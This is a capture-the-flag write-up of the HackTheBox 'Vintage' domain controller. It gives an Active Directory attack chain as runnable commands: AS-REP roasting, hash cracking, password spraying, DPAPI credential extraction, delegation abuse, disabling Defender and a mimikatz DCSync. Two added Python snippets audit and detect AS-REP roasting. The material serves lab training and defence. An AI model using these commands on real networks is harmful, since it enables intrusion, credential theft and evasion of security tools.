
HackTheBox Vintage Writeup

Vintage is a hard-rated HackTheBox Capture The Flag (CTF) machine. This writeup walks through the key steps in a straightforward way so that the concepts behind each one stay clear.

Add Hosts

10.10.11.45 dc01.vintage.htb vintage.htb

Script to add hosts automatically

ip="10.10.11.45"
domain="dc01.vintage.htb vintage.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV vintage.htb -Pn

Nmap scan report for vintage.htb (10.10.11.45)
Host is up (0.054s latency).
rDNS record for 10.10.11.45: dc01.vintage.htb
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-03 23:59:56Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-04T00:00:04
|_  start_date: N/A
|_clock-skew: -8s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Provided credentials: P.Rosa : Rosaisbest123

BloodHound

LDAP user list

ldapsearch -x -H ldap://10.10.11.45 -D "P.Rosa@vintage.htb" -w "Rosaisbest123" -b "DC=vintage,DC=htb" "(objectClass=user)" sAMAccountName | grep "sAMAccountName:" | cut -d " " -f 2 > usernames.txt

Kerberos Tickets

getTGT.py -dc-ip 10.10.11.45 vintage.htb/FS01$:fs01
export KRB5CCNAME=FS01\$.ccache
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k get object 'GMSA01$' --attr msDS-ManagedPassword

getTGT.py vintage.htb/GMSA01$ -hashes 'aad3b435b51404eeaad3b435b51404ee:a317f224b45046c1446372c4dc06ae53'
export KRB5CCNAME=GMSA01\$.ccache
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add groupMember "SERVICEMANAGERS" "P.Rosa"
getTGT.py vintage.htb/P.Rosa:Rosaisbest123 -dc-ip dc01.vintage.htb
export KRB5CCNAME=P.Rosa.ccache

ASREPRoasting

Disable PREAUTH

bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_ARK -f DONT_REQ_PREAUTH
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_LDAP -f DONT_REQ_PREAUTH
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH

Enable Accounts

bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_ARK -f ACCOUNTDISABLE
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_LDAP -f ACCOUNTDISABLE
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_SQL -f ACCOUNTDISABLE

GetNPUsers.py -dc-ip 10.10.11.45 -request -usersfile usernames.txt vintage.htb/
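The two bloodyAD steps above leave the service accounts with DONT_REQ_PREAUTH set and ACCOUNTDISABLE cleared, which is exactly the state GetNPUsers.py looks for. An added audit example, not part of this writeup, that decodes userAccountControl and flags accounts in that state from a constructed LDAP-style user list (the records and values are made up for the example):

```python
# Added audit example (not from the writeup): decode userAccountControl
# and flag accounts in the state the AS-REP roast above depends on.
# SAMPLE_USERS is constructed sample data, not a real LDAP dump.

ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_REQ_PREAUTH = 0x400000

UAC_FLAGS = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH",
}

SAMPLE_USERS = [  # constructed: sAMAccountName and userAccountControl
    {"sAMAccountName": "svc_sql", "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH},
    {"sAMAccountName": "svc_ark", "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH | ACCOUNTDISABLE},
    {"sAMAccountName": "c.neri", "userAccountControl": NORMAL_ACCOUNT},
]


def decode_uac(value: int) -> list[str]:
    """Names of the known flags set in a userAccountControl value."""
    return [name for bit, name in UAC_FLAGS.items() if value & bit]


def asrep_roastable(users) -> list[str]:
    """Enabled accounts with DONT_REQ_PREAUTH: the KDC returns an AS-REP
    for these without any proof of the password."""
    hits = []
    for u in users:
        uac = int(u["userAccountControl"])
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            hits.append(u["sAMAccountName"])
    return sorted(hits)


def audit(users=SAMPLE_USERS) -> dict:
    """Roastable now, plus disabled accounts that become roastable as soon
    as someone clears ACCOUNTDISABLE (the second bloodyAD step above)."""
    roastable = asrep_roastable(users)
    latent = sorted(u["sAMAccountName"] for u in users
                    if int(u["userAccountControl"]) & DONT_REQ_PREAUTH
                    and u["sAMAccountName"] not in roastable)
    return {"roastable": roastable, "latent": latent}


if __name__ == "__main__":
    for u in SAMPLE_USERS:
        print(u["sAMAccountName"], decode_uac(u["userAccountControl"]))
    print(audit())
```

Feeding a real export in (for example the ldapsearch output above with userAccountControl requested as a second attribute) turns this into a recurring check that the flag never reappears on enabled accounts.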

Resulting hash

$krb5asrep$23$svc_sql@VINTAGE.HTB:c65f23feb7e3e10c87e6d1a3a432a9cf$7e3d9e28272e1d10795a0c482b3eb538096577268c8721662befadf2367f5e9bd93dbc458e1b86d0b384005c0cab7e0136acebf277e6db07971a34bb1cb9a58178f4cf05ea3d1b4e4737590ecdf024bba30cd1e0391cb771a26a62374acb61c0253354fd043082c8b21d8eda40957a68a7552d9be122a5bbfa1ca666817c6eaaec5f0ac1083bfb98b1e0e4065f140d8bebefe877ab070e91c6d24d33cacac1105e4517d347af3b5c10ff9b707b2d7b43867d0b3f0556c2130c4cd67d08dfa9fac0571f1df6de7c3bdbcbf39d6121380d38120ff210ff74219fd9fe6ba551e03de9301bef3cbe948b820e
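The $23$ in that hash is the encryption type: RC4-HMAC (etype 23, 0x17), issued for an account that sent no pre-authentication. On the domain controller the same request is logged as Event ID 4768 with Pre-Authentication Type 0 and Ticket Encryption Type 0x17. An added detection example, not from this writeup, run over constructed log lines (a flattened key=value rendering of those event fields, with made-up client addresses):

```python
# Added detection example (not from the writeup): flag TGT requests
# (Event ID 4768) that look like the AS-REP roast above: no pre-auth
# (PreAuthType 0) and an RC4 ticket (TicketEncryptionType 0x17).
# SAMPLE_LOG is constructed; real events are XML, flattened here to key=value.
import re
from collections import defaultdict

SAMPLE_LOG = """\
EventID=4768 TargetUserName=svc_sql ServiceName=krbtgt TicketEncryptionType=0x17 PreAuthType=0 Status=0x0 IpAddress=10.10.14.5
EventID=4768 TargetUserName=svc_ldap ServiceName=krbtgt TicketEncryptionType=0x17 PreAuthType=0 Status=0x0 IpAddress=10.10.14.5
EventID=4768 TargetUserName=c.neri ServiceName=krbtgt TicketEncryptionType=0x12 PreAuthType=2 Status=0x0 IpAddress=10.10.14.5
EventID=4768 TargetUserName=FS01$ ServiceName=krbtgt TicketEncryptionType=0x12 PreAuthType=2 Status=0x0 IpAddress=10.10.11.45
EventID=4769 TargetUserName=c.neri ServiceName=cifs/dc01 TicketEncryptionType=0x12 PreAuthType=- Status=0x0 IpAddress=10.10.14.5
"""

FIELD = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> dict:
    """Turn one flattened event line into a field dict."""
    return dict(FIELD.findall(line))


def is_asrep_roast(ev: dict) -> bool:
    """A granted TGT request with no pre-authentication and an RC4 ticket."""
    return (ev.get("EventID") == "4768"
            and ev.get("PreAuthType") == "0"
            and ev.get("TicketEncryptionType", "").lower() == "0x17"
            and ev.get("Status") == "0x0")


def detect(log: str = SAMPLE_LOG) -> dict:
    """Group matching events by source address, so one client collecting
    AS-REPs for several accounts (a users-file sweep) stands out."""
    hits = defaultdict(list)
    for line in log.splitlines():
        ev = parse_event(line)
        if is_asrep_roast(ev):
            hits[ev["IpAddress"]].append(ev["TargetUserName"])
    return dict(hits)


if __name__ == "__main__":
    for ip, users in detect().items():
        print(f"AS-REP without pre-auth from {ip}: {', '.join(users)}")
```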

Brute Force the Hash

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 18200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt

This yields Zer0the0ne

kerbrute --dc vintage.htb -d vintage.htb -v passwordspray usernames.txt Zer0the0ne

C.Neri@vintage.htb:Zer0the0ne

Remember that /etc/krb5.conf is needed for the Kerberos steps below, but remove it after finishing the box, as a stale realm configuration interferes with later ones.

getTGT.py vintage.htb/c.neri:Zer0the0ne -dc-ip vintage.htb
echo -e '[libdefaults]\n    default_realm = VINTAGE.HTB\n    dns_lookup_kdc = false\n    rdns = false\n\n[realms]\n    VINTAGE.HTB = {\n        kdc = 10.10.11.45\n        admin_server = 10.10.11.45\n    }\n\n[domain_realm]\n    .vintage.htb = VINTAGE.HTB\n    vintage.htb = VINTAGE.HTB\n' | sudo tee /etc/krb5.conf
export KRB5CCNAME=c.neri.ccache
evil-winrm -i dc01.vintage.htb -r vintage.htb

cat ../Desktop/user.txt
whoami /priv

DPAPI Credentials

The WinRM download wasn’t working until I removed its hidden property, though I’m not sure why.

cd 'C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials'
Set-ItemProperty -Path .\C4BB96844A5C9DD45D5B6A9859252BA6 -Name Attributes -Value ([System.IO.FileAttributes]::Normal)
download C4BB96844A5C9DD45D5B6A9859252BA6
cd 'C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115'
Set-ItemProperty -Path '.\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b' -Name Attributes -Value ([System.IO.FileAttributes]::Normal)
download '99cf41a3-a552-4cf7-a8d7-aca2d6f7339b'

Local:

dpapi.py masterkey -file '99cf41a3-a552-4cf7-a8d7-aca2d6f7339b' -sid 'S-1-5-21-4024337825-2033394866-2055507597-1115' -password Zer0the0ne
dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key '0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a'

c.neri_adm:Uncr4ck4bl3P4ssW0rd0312

Delegation and SPN Attack

export KRB5CCNAME=c.neri.ccache
bloodyad -k --host dc01.vintage.htb -d VINTAGE.HTB remove uac SVC_SQL -f ACCOUNTDISABLE
bloodyad -k --host dc01.vintage.htb -d VINTAGE.HTB set object 'SVC_SQL' servicePrincipalName -v "cifs/x"
getTGT.py -dc-ip 10.10.11.45 'VINTAGE.HTB/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312'
export KRB5CCNAME=c.neri_adm.ccache
bloodyad -k --host dc01.vintage.htb -d vintage.htb add groupMember "delegatedadmins" "svc_sql"
getTGT.py -dc-ip 10.10.11.45 'VINTAGE.HTB/svc_sql:Zer0the0ne'
export KRB5CCNAME=svc_sql.ccache
getST.py -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb/svc_sql:Zer0the0ne'
export KRB5CCNAME=L.BIANCHI_ADM.ccache
wmiexec.py -k -no-pass VINTAGE.HTB/L.BIANCHI_ADM@dc01.vintage.htb -dc-ip 10.10.11.45

type Users\Administrator\Desktop\root.txt

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $True"
lput ./.local/www/win/creds/mimikatz.exe
mimikatz.exe "privilege::debug" "lsadump::dcsync /user:administrator" "exit"

468c7497513f8243b59980f2240a10de

This post is licensed under CC BY 4.0 by the author.